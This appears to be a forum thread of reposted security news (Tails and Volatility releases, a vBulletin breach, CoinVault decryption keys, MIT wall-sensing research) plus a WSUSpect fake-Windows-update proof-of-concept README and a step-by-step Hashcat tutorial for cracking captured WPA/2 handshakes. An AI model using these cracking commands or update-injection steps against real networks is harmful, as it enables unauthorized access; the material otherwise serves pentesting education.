Tails 1.7 is out Posted November 3rd, 2015 by tails in Tails, The Amnesic Incognito Live System, version 1.7, is out.This release fixes numerous security issues. All users must upgrade as soon as possible. New features You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents. We added Icedove, a rebranded version of the Mozilla Thunderbird email client.Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove. Upgrades and changes Improve the wording of the first screen of Tails Installer. Restart Tor automatically if connecting to the Tor network takes too long. (#9516) Update several firmware packages which might improve hardware compatibility. Update the Tails signing key which is now valid until 2017. Update Tor Browser to 5.0.4. Update Tor to 0.2.7.4. Fixed problems Prevent wget from leaking the IP address when using the FTP protocol. (#10364) Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333) Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades. Make the "I2P is ready" notification more reliable. Known issues See the current list of known issues. Download or upgrade Go to the download or upgrade page.If you have been updating automatically for a while and your Tails does not boot after an automatic upgrade, you can update your Tails manually. What's coming up? The next Tails release is scheduled for December 15.Have a look at our roadmap to see where we are heading to.We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us! Support and feedback For support and feedback, visit the Support section on the Tails website. Sursa: https://blog.torproject.org/blog/tails-17-out

openSUSE Leap 42.1 Becomes First Hybrid Distribution November 4th, 2015 by Douglas DeMaio Bridging Community and Enterprise The wait is over and a new era begins for openSUSE releases. Contributors, friends and fans can now download the first Linux hybrid distro openSUSE Leap 42.1. Since the last release, exactly one year ago, openSUSE transformed its development process to create an entirely new type of hybrid Linux distribution called openSUSE Leap. Version 42.1 is the first version of openSUSE Leap that uses source from SUSE Linux Enterprise (SLE) providing a level of stability that will prove to be unmatched by other Linux distributions. Bonding community development and enterprise reliability provides more cohesion for the project and its contributor’s maintenance updates. openSUSE Leap will benefit from the enterprise maintenance effort and will have some of the same packages and updates as SLE, which is different from previous openSUSE versions that created separate maintenance streams. Community developers provide an equal level of contribution to Leap and upstream projects to the release, which bridges a gap between matured packages and newer packages found in openSUSE’s other distribution Tumbleweed. Since the move was such a shift from previous versions, a new version number and version naming strategy was adapted to reflect the change. The SLE sources come from SUSE’s soon to be released SLE 12 Service Pack 1 (SP1). The naming strategy is SLE 12 SP1 or 12.1 + 30 = openSUSE Leap 42.1. Many have asked why 42, but SUSE and openSUSE have a tradition of starting big ideas with a four and two, a reference to The Hitchhiker’s Guide to the Galaxy. Every minor version of openSUSE Leap users can expect a new KDE and GNOME, but today is all about openSUSE Leap 42.1, so if you are tired of a brown desktop, try a green one. Have a lot of fun! More info: https://news.opensuse.org/2015/11/04/opensuse-leap-42-1-becomes-first-hybrid-distribution/

Nu permitem astfel de lucruri.

vBulletin Website Offline After Hacker Attack By Eduard Kovacs on November 02, 2015 The developers of the vBulletin forum software have taken down their official website and forum following a hacker attack that may have resulted in user data getting stolen. Users who attempted to access the vBulletin forum on Sunday were greeted by a message that read “Hacked by Coldzer0.” The website and forum currently display a “down for maintenance” message. The extent of the damage is unclear, but the hacker has published screenshots apparently showing that he managed to upload a shell to the vBulletin website and obtain user data, including user IDs, names, email addresses, security questions and answers, and password salts, DataBreaches.net reported. Internet Brands-owned vBulletin Solutions has yet to release a statement on the incident and the company could not immediately be reached for comment. Users should change their passwords as a precaution as soon as the website comes back online. If the same password is used on other websites, it should be changed there as well. The attacker claims to have used a zero-day vulnerability in vBulletin to hack this and other websites powered by the popular forum software. DataBreaches.net has connected the online moniker “Coldzer0” to Mohamed Osama, a malware analyst and security researcher based in Egypt. Osama has removed all references to the vBulletin attack from his social media accounts, and deleted the content of his personal website after his name was linked to the breach. Vulnerabilities in unpatched versions of vBulletin are often leveraged to breach websites using the forum software. In 2013, thousands of websites were hacked via a security hole in vBulletin. Australian security expert Troy Hunt, owner of the Have I Been Pwned service, which allows users to learn if and where their personal data has been compromised, noted that Have I Been Pwned includes data leaked as a result of several vBulletin-powered website breaches. Sursa: vBulletin Website Offline After Hacker Attack | SecurityWeek.Com

Malware Hunting Dat?: mai. 06, 2015 5:00p.m.–6:15p.m. Ziua 3 Arie Crown Theater BRK3319 Vorbitori: Mark Russinovich Mark provides an overview of several Sysinternals tools, including Process Monitor, Process Explorer, Autoruns and the new Sysmon tool, focusing on the features useful for malware analysis and removal. These utilities enable deep inspection and control of processes, file system and registry activity, and autostart execution points. He demonstrates their malware-hunting capabilities by presenting several current, real-world malware samples and using the tools to identify and clean malware. Desc?rca?i Cum pot desc?rca videoclipurile? Pentru desc?rcare, face?i clic dreapta pe tipul de fi?ier dorit ?i alege?i „Save target as” (Salva?i ?inta ca) sau „Save link as” (Salva?i linkul ca). De ce ar trebui s? descarc videoclipuri de la Channel 9? Este o modalitate simpl? de a salva local videoclipurile preferate. Pute?i s? salva?i videoclipurile pentru a le putea urm?ri offline. Dac? dori?i doar s? asculta?i sunetul, pute?i s? desc?rca?i fi?ierul MP3! Ce versiune trebuie s? aleg? Dac? dori?i s? vizualiza?i videoclipul pe PC, Xbox sau Media Center, desc?rca?i fi?ierul MP4 de calitate înalt? (aceasta este versiunea cu calitatea cea mai înalt?). Dac? dori?i o versiune cu o rat? de bi?i mai mic? pentru a reduce timpul ?i costul desc?rc?rii, alege?i fi?ierul MP4 de calitate medie. Dac? ave?i un dispozitiv Windows Phone, iPhone, iPad sau Android, alege?i fi?ierul MP4 de calitate redus? sau medie. Dac? dori?i doar s? auzi?i sunetul videoclipului, alege?i fi?ierul MP3. Face?i clic dreapta pe „Save as (Salvare ca)”. MP4, calitate înalt?(cea mai bun? calitate disponibil?) File size 0,0 B MP4, calitate redus?(aprox. 500-800 kbps) Link: https://channel9.msdn.com/Events/Ignite/2015/BRK3319

WSUSpect Proxy Written by Paul Stone and Alex Chapman, Context Information Security Summary This is a proof of concept script to inject 'fake' updates into non-SSL WSUS traffic. It is based on our Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update' White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf Prerequisites You'll need the Python Twisted library installed. You can do this by running: pip install twisted You also need to place a Microsoft-signed binary (e.g. PsExec) into the payloads directory. This script has been tested on Python 2.7. It does not yet work with Python 3.x; contributions are welcome. Usage To test this out, you'll need a target Windows 7 or 8 machine that is configured to receive updates from a WSUS server over unencrypted HTTP. The machine should be configured to proxy through the machine running this script. This can be done by manually changing the proxy settings or via other means such as WPAD poisoning (e.g. using Responder) python wsuspect_proxy.py payload_name [port] An example payload for PsExec is set up that will launch cmd.exe running as Administrator: python wsuspect_proxy.py psexec If you are having problems getting the script to work we'd recommend using a GUI proxy tool such as Burp (and configuring Burp to use this script as a proxy) to see if the update XML is being correctly inserted. Customisation Modify payloads/payloads.ini to change the payloads and their arguments. Known Issues Currently doesn't support Windows 10 targets Doesn't yet support Python 3 Screenshots Sursa: https://github.com/ctxis/wsuspect-proxy

WPA/2 Cracking Using HashCat [ch5pt2] by rootsh3ll | Oct 31, 2015 Hello reader and welcome to part 2 from chapter 5 of the WiFi Security and Pentesting Series. If you remember in the previous part, we learned Speeding up WPA/2 Cracking Using Pre-generated PMKs. Which certainly uses CPU as the primary part for the calculations of the PMKs. It surely gives us speed for cracking as while using PMKs for cracking we are not performing actual calculations in real-time. This brings us to some drawbacks of using PMKs, as follows: SSID Specific. You cannot use PMKs generated for SSID, say “rootsh3ll” for another SSID like “Belkin“. Case-Sensitive. Cannot be used even a single letter is up/lower case. Ex: Won’t work for “Rootsh3ll“ if PMKs are created for “rootsh3ll“. Time used is the same. As processing power of CPU is same in both cases, the time required for creating PMKs are equal even if you crack using Aircrack or creating PMKs(with GenPMK). Huge HD Space required. As we are pre-calculating the PMKs and storing them on HD, it requires a lot of space on your HD and that too for a specific SSID. Which is not an option all the time. Less helpful in today’s scenario. Nowadays routers are being shipped with unique SSID. Ex: Belkin_04A2 for preventing routers from these kind of attacks or atleast delay the cracking duration. You might be thinking now that If this is so, then why would I even consider PMKs for cracking ? Well, as I said above this is Less helpful, that means in some cases. Cases like: Simple SSIDs. Ex: MTNL, Airtel, Linksys etc Before trying any complex task to crack the PSK, if you have PMKs already stored. Give them a shot Mobile numbers are still very common passwords. Still, even if this gives us speed this method is a bit slow. You don’t always have a friend ready to give you a pre-generated PMK file for a specific SSID just when you have captured the handshake, right ? yeah, it’s very rare! Here is when you need to stop using your CPU and test the processing power of you GPU. If you are not aware of using GPUs for cracking purposes let me tell you, Yes GPUs can be used for cracking password hashes and are being used now from a while. There are plenty of tools which uses GPU to boost the cracking speed and lets you crack in way much lesser time that your CPU would have the job finished. Tools like: Pyrit BarsWF HashCat igHashGPU How ? Simple! Your CPU has 2,4,8 cores, means parallel computing units where GPUs have them in thousands, if not hundreds. NOTE: My GeForce GT 525M have 296 cores, and it is pretty old Graphics card, Speed: ~6000 PMK/s. NVidia Titan X is the Best single graphics card with cracking speed up to 2,096,000 hashes/sec. Using GPU for Cracking WPA/2 Passwords Being in the scope of the series we will stick to WPA/2 cracking with GPU in this chapter. For learning difference between CPU and GPU cracking you can visit the following post I’d previously written on FromDev.com. CPU vs. GPU Password Hash Cracking – FromDev.com Tools described above are used for cracking various kinds of passwords. There are 2 tools used for Cracking WPA/2-PSK using GPU from the above list Pyrit HashCat As the post title suggests we will go with HashCat. What is HashCat ? Hashcat is a self-proclaimed command line based world’s fastest password cracker. It is the world’s first and only GPGPU based rule engine and available for Linux, OSX, and Windows free-of-cost. It comes in 2 variants CPU Based GPU Based There is no difference when passing commands to Hashcat because it automatically uses the best method to crack passwords, either CPU or GPU depending on the Graphics driver you have installed or not. Hashcat is fast and extremely flexible- to writer made it in such a way that allows distributed cracking. There are multiple version of HashCat, each optimized and suited for different methods of cracking (dictionary, single hash, distributed etc). I highly recommend Hashcat over Pyrit for its flexibility. Why use HashCat at first place ? As already told above, because of it’s flexibility and vast support of algorithms. But why Hashcat when I just want to crack WPA/2 most of the times ? If you have used or haven’t used Pyrit yet, let me tell you one thing. Pyrit is perhaps the fastest WPA/2 cracker available on the internet but it uses dictionary or wordlist to crack the passwords even if you use PMKs or directly run the cracker you need to have a large amount of dictionaries to test the validity of the hash. For storing hashes you need a lot of disk space. As you can see in the image below, there is a few wordlists that almost take >25 GB on the disk(Extracted), and it take more than 2-3 days to run through them all even with GPU. You can download some useful wordlists here. But most of the times there are some pattern(default passwords) we like to test for validity. Patterns like: Mobile number Date of Birth Default password patterns like “56324FHe“ 10 digit default password by ISP and so on Here is when We have to leave Pyrit with it’s dictionaries and get our hands-on with HashCat. HashCat have a brilliant feature called mask-attack, which allows us to create user-defined patterns to test for password validity and you know what the best thing is ? It requires 0 Bytes on your hard drive. How ? Before we go through this we need to understand that in some cases we need Wordlists. Its only when we are 100% certain that it has some kind of pattern we can use this type of attack. So of you know a certain ISP has 10 random numbers and only a few letters, you could do it to save space on your HD. WPA/2 cracking is a tedious task and uses maximum power of the system when we use Hashcat for the purpose and sometimes it needs to take down the load from the system to switch tasks. hashcat stands best here for it’s remarkable feature. It supports pause/resume while cracking Supports sessions and restore We will see this feature in this tutorial. Keep reading. Supported Attack types Dictionary based attack Brute-force/Mask attack Hybrid dict + mask Hybrid mask + dict Permutation attack Rule-based attack Toggle-case attack These are too name a few. Hashcat supports way too many algorithms to get your hash cracked. NOTE: Traditional Brute-force attack is outdated and is replaced by Mask attack in Hashcat. Wee will see later in this post in details about this. Variants As told above Hashcat comes in 2 vaiants: Hashcat -A CPU based password cracker Oclhashcat/CudaHashcat – GPU accelerated tool Setting up the Lab Installing Graphics driver You have basically 2 choices Install graphics driver in Kali Linux directly, i.e your Pentesting distro. Install graphics driver in Windows or OSX. I have Kali Sana installed in my Virtual machine and unfortunately no virtual machine supports using graphics card or GPU acceleration inside the virtual OS. So I’ll be sticking with Hashcat on windows. You can still do the same task with exact same commands on Kali Linux (or any Linux OS) or OSX with properly installed proprietary drivers. I haven’t written any article on how to install graphics drier in Kali Linux as BlackmoreOps already have a great article on same. so you can follow the links and try installing the same on your version of Kali. NVidia Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.x/2.x Install AMD APP SDK in Kali Linux Install CAL++ in Kali Linux Download HashCat You can download Hashcat from it’s official website: http://hashcat.net/ File is highly compressed using 7z compression. So make sure you have atleast 1 GB before extracting the downloaded file. You can use 7zip extractor to decompress the .7z file. Download it here: http://www.7-zip.org/download.html P.S: It is free of use and better than WinRAR. Cleanup your cap file using wpaclean Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand. Here’s how to do it: To convert your .cap files manually in Kali Linux, use the following command wpaclean <out.cap> <in.cap> Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion. Convert .cap file to .hccap file Now assuming that you have installed appropriate graphics driver for the selected OS, moving on to the nest step. We need to convert the previously captured handshake i.e .cap file to a format that hashcat could understand and it is .hccap file format. Nothing difficult or time taking. Command to convert .cap to .hccap goes like this aircrack-ng -J <output.hccap> <path/to/.cap file> Here output.hccap is the output filename with .hccap file format and input.cap is the handshake originally captured. Log in to Kali Linux, open Terminal and type: aircrack-ng -J “rootsh3ll-01.hccap” “rootsh3ll-01.cap” Note: rootsh3ll-01.cap is located on Desktop. Check location of your .cap file. Now we have .hccap file, installed graphics driver and downloaded hashcat. Let’s begin the cracking. Cracking WPA/2 Passwords using Hashcat We will cover the following topics: WPA/2 Cracking with Dictionary attack using Hashcat. WPA/2 Cracking with Mask attack using Hashcat. WPA/2 Cracking with Hybrid attack using Hashcat. WPA/2 Cracking Pause/resume in Hashcat (One of the best features) WPA/2 Cracking save sessions and restore. WPA/2 dictionary attack using Hashcat Open cmd and direct it to Hashcat directory, copy .hccap file and wordlists and simply type in cmd cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap wordlist.txt wordlist2.txt Here I have NVidia’s graphics card so I use CudaHashcat command followed by 64, as I am using Windows 10 64-bit version. yours will depend on graphics card you are using and Windows version(32/64). cudaHashcat64.exe – The program, In the same folder theres a cudaHashcat32.exe for 32 bit OS and cudaHashcat32.bin / cudaHashcat64.bin for Linux. oclHashcat*.exe for AMD graphics card. -m 2500 = The specific hashtype. 2500 means WPA/WPA2. In case you forget the WPA2 code for Hashcat. Windows CMD: cudaHashcat64.exe –help | find “WPA” Linux Terminal:cudaHashcat64.bin –help | grep “WPA” It will show you the line containing “WPA” and corresponding code. Handshake-01.hccap = The converted *.cap file. wordlist.txt wordlist2.txt= The wordlists, you can add as many wordlists as you want. To simplify it a bit, every wordlist you make should be saved in the CudaHashcat folder. After executing the command you should see a similar output: Wait for Hashcat to finish the task. You can pass multiple wordlists at once so that Hashcat will keep on testing next wordlist until the password is matched. WPA/2 Mask attack using Hashcat As told earlier, Mask attack is a replacement of the traditional Brute-force attack in Hashcat for better and faster results. let’s have a look at what Mask attack really is. In Terminal/cmd type: cudaHashcat64.exe -m 2500 <rootsh3ll-01.hccap> -a 3 ?d?l?u?d?d?d?u?d?s?a -a 3 is the Attack mode, custom-character set (Mask attack) ?d?l?u?d?d?d?u?d?s?a is the character-set we passed to Hashcat. Let’s understand it in a bit of detail that What is a character set in Hashcat ? Why it is useful ? What is a character set in Hashcat ? ?d ?l ?u ?d ?d ?d ?u ?d ?s ?a = 10 letters and digits long WPA key. Can be 8-63 char long. The above text string is called the “Mask”. Every pair we used in the above examples will translate into the corresponding character that can be an Alphabet/Digit/Special character. For remembering, just see the character used to describe the charset ?d: For digits ?s: For Special characters ?u: For Uppercase alphabets ?l: For Lowercase alphabets ?a: all of the above. Simple! isn’t it ? Here is the actual character set which tells exactly about what characters are included in the list: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 [/TD] [TD=class: crayon-code]?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s [/TD] [/TR] [/TABLE] Here are a few examples of how the PSK would look like when passed a specific Mask. PSK = ?d?l?u?d?d?d?u?d?s?a 0aC575G2/@ 9zG432H0*K 8sA111W1$4 3wD001Q5+z So now you should have a good understanding of the mask attack, right ? Let’s dig a bit deeper now. Mixing Mask attack with Custom characters. Let’s say, we somehow came to know a part of the password. So, it would be better if we put that part in the attack and randomize the remaining part in Hashcat, isn’t it ? Sure! it is very simple. Just put the desired characters in the place and rest with the Mask. He ?d ?l 123 ?d ?d ?u ?d C is the custom Mask attack we have used. Here assuming that I know the first 2 characters of the original password then setting the 2nd and third character as digit and lowercase letter followed by “123” and then “?d ?d ?u ?d” and finally ending with “C” as I knew already. What we have actually done is that we have simply placed the characters in the exact position we knew and Masked the unknown characters, hence leaving it on to Hashcat to test further. Here is one more example for the same: Let’s say password is “Hi123World” and I just know the “Hi123” part of the password, and remaining are lowercase letters. Assuming length of password to be 10. So I would simply use the command below [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]cudaHashcat64.exe -m 2500 <handshake.hccap> -a 3 Hi123?u?u?u?u?u [/TD] [/TR] [/TABLE] Where ?u will be replaced by lowercase letters, one by one till the password is matched or the possibilities are exhausted. Moving on even further with Mask attack i.r the Hybrid attack. In hybrid attack what we actually do is we don’t pass any specific string to hashcat manually, but automate it by passing a wordlist to Hashcat. Hashcat picks up words one by one and test them to the every password possible by the Mask defined. Example: cudaHashcat64.exe -m 2500 handshake.hccap -a 1 password.txt ?d?l?d?l -a 1 : The hybrid attack password.txt : wordlist ?d?l?d?l = Mask (4 letters and numbers) The wordlist contains 4 words. carlos bigfoot guest onion Now it will use the words and combine it with the defined Mask and output should be this: carlos2e1c bigfoot0h1d guest5p4a onion1h1h It is cool that you can even reverse the order of the mask, means you can simply put the mask before the text file. Hashcat will bruteforce the passwords like this: 7a2ecarlos 8j3abigfoot 0t3wguest 6a5jonion You getting the idea now, right ? Using so many dictionary at one, using long Masks or Hybrid+Masks takes a long time for the task to complete. It is not possible for everyone every time to keep the system on and not use for personal work and the Hashcat developers understands this problem very well. So, they came up with a brilliant solution which no other password recovery tool offers built-in at this moment. That is the Pause/Resume feature WPA/2 Cracking Pause/resume in Hashcat (One of the best features) This feature can be used anywhere in Hashcat. It isn’t just limited to WPA/2 cracking. Even if you are cracking md5, SHA1, OSX, wordpress hashes. As soon as the process is in running state you can pause/resume the process at any moment. Just press [p] to pause the execution and continue your work. To resume press [r]. All the commands are just at the end of the output while task execution. See image below You might sometimes feel this feature as a limitation as you still have to keep the system awake, so that the process doesn’t gets cleared away from the memory. And we have a solution for that too. Create session! WPA/2 Cracking save Sessions and Restore. Creating and restoring sessions with hashcat is Extremely Easy. Just ass –session at the end of the command you want to run followed by the session name. Example: cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap -a 3 Hello?d?l?d?u123?l?l?u –session=blabla Here I named the session “blabla”. You can see in the image below that Hashcat has saved the session with the same name i.e blabla and running. Now you can simply press [q] close cmd, ShutDown System, comeback after a holiday and turn on the system and resume the session. That easy! NOTE: Once execution is completed session will be deleted. How to restore ? Above command – “–restore”. Here it goes: cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap -a 3 Hello?d?l?d?u123?l?l?u –session=blabla –restore Hashcat will now check in its working directory for any session previously created and simply resume the Cracking process. Simple enough ? Yes it is. This is all for Hashcat. Hope you understand it well and performed it along. No need to be sad if you don’t have enough money to purchase those expensive Graphics cards for this purpose you can still try cracking the passwords at high speeds using the clouds. You just have to pay accordingly. Cloud for Cracking WPA/2-PSK You can even leverage cloud for the same purpose. You just have to pay for the service you use as it requires a lot of money, electricity to keep the system up and running and keeping it fast at the same time. A Website that provide the similar service is http://cloudcracker.com/. They charge $17 for 300 Million words in 20 minutes. Which means 250,000 PMK/Second. Sounds nice! isnt it ? Well this is a service so they surely have their part of profit. If you are at a shortage of money you can try even cheaper service. Don’t worry this cheap is actually better than the expensive if you are able to do it accordingly. That is Amazon Elastic Computing 2(EC2) or AWS (Amazon Web Services). Here you need to do all the things manually after logging into the remote host that yo0u have purchased. You have to install the tools and dependencies accordingly and give commands to the master server to perform the cracking. You can aso create upto 1000 instances to distribute the load and increase the cracking speed. Price will change accordingly. But in short let me tell you if you are willing to do this Super Interesting stuff, it will cost you maximum of $1 an hour for even greater speeds than cloudcracker. Here is a video to help you understand better the concept of load distribution and command the master server. Hope you are getting the concept. Here is one more for you to see the cracking process running on Amazon EC2, It’s an old video but worth watch and understand the concept. Forgot to tell you one good news. Amazon EC2 is FREE for first month. It will just ask you for the credit/debit card info as a validation proof. But don’t worry no extra penny will be deducted until you extend to new plan. So I would encourage you to do some research on this specific topic after getting over of Hashcat. It is the real Fun believe me! If you love all this crazy stuff You will love that too. Hope this was helpful enough! Keep Learning. See you in the next chapter with the Aircrack Boost Script! Useful Links: Router: TP-LINK TL-MR3420 300 MB/s Wireless Router 2x 5dBi antennas Network Adapters: Alfa AWUSO36NH High Gain B/G/N USB / Alfa AWUS036NHA B/G/N USB High Gain Antenna: Alfa 9dBi WiFi Omni-Directional High-Gain Antenna USB Drive (32 GB): SanDisk Ultra Fit USB 3.0 32GB Pen Drive Graphics Card NVidia: GeForce GTX TITAN X 12GB (BEST single GPU for Cracking) AMD: Radeon HD 6990 830M 4 GB (3X HD6990 equivalent to 1x-Titan X) [Cheap] Sursa: http://www.rootsh3ll.com/2015/10/rwsps-wpa2-cracking-using-hashcat-cloud-ch5pt2/

Toata lumea trebuie sa stie ce e Volatility.

This is the first release since the publication of The Art of Memory Forensics! It adds support for Windows 10 (initial), Linux kernels 4.2.3, and Mac OS X El Capitan. Additionally, the unified output rendering gives users the flexibility of asking for results in various formats (html, sqlite, json, xlsx, dot, text, etc.) while simplifying things for plugin developers. In short, less code leads to more functionality. This is especially useful for framework designers (GUIs, web interfaces, library APIs), because you can interface with a plugin directly and ask for json, which you then store, process, or modify however you want. This release also coincides with the Community repo - a collection of Volatility plugins written and maintained by authors in the forensics community. Many of these are the result of the last 3 years of Volatility plugin contests, but some were just written for fun. Either way, its an entire arsenal of plugins that you can easily extend into your existing Volatility installation. Released: October 2015 Volatility 2.5 Windows Standalone Executable Volatility 2.5 Mac OS X Standalone Executables Volatility 2.5 Linux Standalone Executables Volatility 2.5 Source Code (.zip) Integrity Hashes View the README View the CREDITS Release Highlights Windows Added profiles for Windows 8.1 Update 1 Added basic support for Windows 10 New plugin to print AmCache information from the registry (amcache) New plugin to dump registry files to disk (dumpregistry) New plugin to detect hidden/unlinked service record structures (servicediff) New plugin to print the shutdown time from the registry (shutdowntime) New plugin to print editbox controls from the GUI subsystem (editbox) Malfind plugin detects injected code with erased PE headers Imagecopy and raw2dmp can display the number of bytes copied or converted Fix an issue with the memmap and memdump offsets being inconsistent Fix an issue with vadtree's graphviz fill colors not being rendered by some viewers Update the well known SIDs reported by the getsids plugin Add an optional --max-size parameter to yarascan, dump_maps, etc Fix an issue translating strings in PAE and x64 images Add options to yarascan for case-insensitive search Add options to yarascan to scan process and kernel memory at once [*] Mac OSX Added profiles and support for Mac 10.10 Yosemite and 10.11 El Capitan New plugin to print and extract compressed swap data (mac_compressed_swap) New plugin to automatically detect Mac OS X profiles (mac_get_profile) New plugin(s) to report Kauth scopes and listeners (mac_list_kauth_scopes | listeners) New plugin to identify applications with promiscuous sockets (mac_list_raw) New plugin to find hidden threads (mac_orphan_threads) New plugin to print process environment variables (mac_psenv) New plugin to print basic and complex thread data (mac_threads, mac_threads_simple) [*] Linux/Android Addd support for Linux kernels up to 4.2.3 New plugin to print Linux dynamic environment variables (linux_dynamic_env) New plugin to print the current working directory of processes (linux_getcwd) New plugin to carve for network connection structures (linux_netscan) Speed improvements to various plugins Improve handling of mprotect() Linux memory regions Operating System Support 64-bit Windows Server 2012 and 2012 R2 32- and 64-bit Windows 10 (initial/basic support) 32- and 64-bit Windows 8, 8.1, and 8.1 Update 1 32- and 64-bit Windows 7 (all service packs) 32- and 64-bit Windows Server 2008 (all service packs) 64-bit Windows Server 2008 R2 (all service packs) 32- and 64-bit Windows Vista (all service packs) 32- and 64-bit Windows Server 2003 (all service packs) 32- and 64-bit Windows XP (SP2 and SP3) 32- and 64-bit Linux kernels from 2.6.11 to 4.2.3 32-bit 10.5.x Leopard (the only 64-bit 10.5 is Server, which isn't supported) 32- and 64-bit 10.6.x Snow Leopard 32- and 64-bit 10.7.x Lion 64-bit 10.8.x Mountain Lion (there is no 32-bit version) 64-bit 10.9.x Mavericks (there is no 32-bit version) 64-bit 10.10.x Yosemite (there is no 32-bit version) 64-bit 10.11.x El Capitan (there is no 32-bit version) Memory Format Support Raw/Padded Physical Memory Firewire (IEEE 1394) Expert Witness (EWF) 32- and 64-bit Windows Crash Dump 32- and 64-bit Windows Hibernation 32- and 64-bit MachO files Virtualbox Core Dumps VMware Saved State (.vmss) and Snapshot (.vmsn) HPAK Format (FastDump) QEMU memory dumps Sursa: http://www.volatilityfoundation.org/#!25/c1f29

Good job!

Researchers use Wi-Fi to see gestures, identify individuals through walls by Lisa Vaas on October 30, 2015 MIT has created a device that can discern where you are, who you are, and which hand you're moving, from the opposite side of a building, through a wall, even though you're invisible to the naked eye. Researchers at MIT's Computer Science and Artificial Intelligence Lab (CSAIL) have long thought it could be possible to use wireless signals like Wi-Fi to see through walls and identify people. The team is now working on a system called RF-Capture that picks up wireless reflections from the human body to see the silhouette of a human standing behind a wall. It's the first system capable of capturing the human figure when the person is fully occluded, MIT said in an announcement on Wednesday. CSAIL researchers have been working to track human movement since 2013. They have already unveiled wireless technologies that can detect gestures and body movements "as subtle as the rise and fall of a person’s chest from the other side of a house," which, MIT says, could enable a mother to monitor a baby’s breathing or a firefighter to determine if there are survivors inside a burning building. RF-Capture's motion-capturing technology can also enable it to call emergency services if it detects that a family member has fallen, according to Dina Katabi, an MIT professor, paper co-author and director of the Wireless@MIT center: We’re working to turn this technology into an in-home device that can call 911 if it detects that a family member has fallen unconscious. The RF-Capture device works by transmitting wireless signals and then reconstructing a human figure by analyzing the signals' reflections. Unlike the emergency-alert wristbands and pendants often worn by the elderly - including the meme-generating "I've fallen and I can't get up" LifeCall devices - people don't need to wear a sensor to be picked up by RF-Capture. The device's transmitting power is 10,000 times lower than that of a standard mobile phone. In a paper accepted to the SIGGRAPH Asia conference taking place next month, the team reports that by tracking a human silhouette, RF-Capture can trace a person’s hand as he writes in the air, determine how a person behind a wall is moving, and even distinguish between 15 different people through a wall, with nearly 90% accuracy. That's just one of many possible uses in a networked, "smart" home, Katabi said: You could also imagine it being used to operate your lights and TVs, or to adjust your heating by monitoring where you are in the house. Beyond tracking the elderly or saving people from burning buildings, MIT also has its eye on Hollywood. PhD student Fadel Adib, lead author on the team's paper, suggested that RF-Capture could be a less clunky way to capture motion than what's now being used: Today actors have to wear markers on their bodies and move in a specific room full of cameras. RF-Capture would enable motion capture without body sensors and could track actors’ movements even if they are behind furniture or walls. RF-Capture analyzes the human form in two stages: First, it scans a given space in three dimensions to capture wireless reflections off objects in the environment, including furniture or humans. Given the curvature of human bodies, some of the signals get bounced back, while some get bounced away from the device. RF-Capture then monitors how these reflections vary as someone moves in the environment, stitching the person’s reflections across time to reconstruct one, single image of a silhouette. To differentiate individuals, the team then repeatedly tested and trained the device on different subjects, incorporating metrics such as height and body shape to create "silhouette fingerprints" for each person. MIT says the key challenge is that the same signal is reflected from different individuals as well as from different body parts. How do you tell the difference between various limbs, never mind entire humans? Katabi says it boils down to number crunching: The data you get back from these reflections are very minimal. However, we can extract meaningful signals through a series of algorithms we developed that minimize the random noise produced by the reflections. Sursa: https://nakedsecurity.sophos.com/2015/10/30/researchers-use-wi-fi-to-see-gestures-identify-individuals-through-walls/

CoinVault and Bitcryptor ransomware victims don't need to pay the ransom Posted on 30.10.2015 Kaspersky Lab has added an additional 14,031 decryption keys to their free repository, enabling all those who have fallen victim to CoinVault and Bitcryptor ransomware to retrieve their encrypted data without having to pay a ransom to cybercriminals. The cybercriminals behind CoinVault tried to infect tens of thousands of computers worldwide, with the majority of victims in the Netherlands, Germany, the USA, France and the UK. Consumers from a total of 108 countries were affected. The criminals succeeded in locking at least 1,500 Windows-based machines, demanding bitcoins from users to decrypt their files. Kaspersky Lab discovered the first version of CoinVault in May 2014, and later completed a thorough analysis of all the associated malware samples for the investigation run by the National High Tech Crime Unit (NHTCU) of the Netherlands’ police and the Netherlands’ National Prosecutors Office. During the joint investigation, the NHTCU and the Netherlands’ National Prosecutors Office obtained databases from CoinVault command & control servers. These servers contained Initialization Vectors (IVs), keys and private bitcoin wallets, which helped Kaspersky Lab and the NHTCU to create a special repository of decryption keys: noransom.kaspersky.com. Since April 2015, a total of 14,755 keys have been made available for victims so that they can release their files by using the decryption application developed by Kaspersky Lab’s security experts to release their files. In September, the Dutch police arrested two men in the Netherlands on suspicion of involvement in the ransomware attacks. With these arrests, and the fact that the last portion of keys has now been obtained from the server, the case on the CoinVault attacks is now closed. “The CoinVault story is ending: the remaining victims can retrieve their files and the cybercriminals have been caught, thanks to collaboration between the Dutch police, Kaspersky Lab and Panda Security. The CoinVault investigation has been unique in that we have been able to retrieve all the keys. Through sheer hard work we were able to disrupt the entire business model of the cybercriminal group,” said Jornt van der Wiel, Security Researcher at Global Research and Analysis Team, Kaspersky Lab. Sursa: 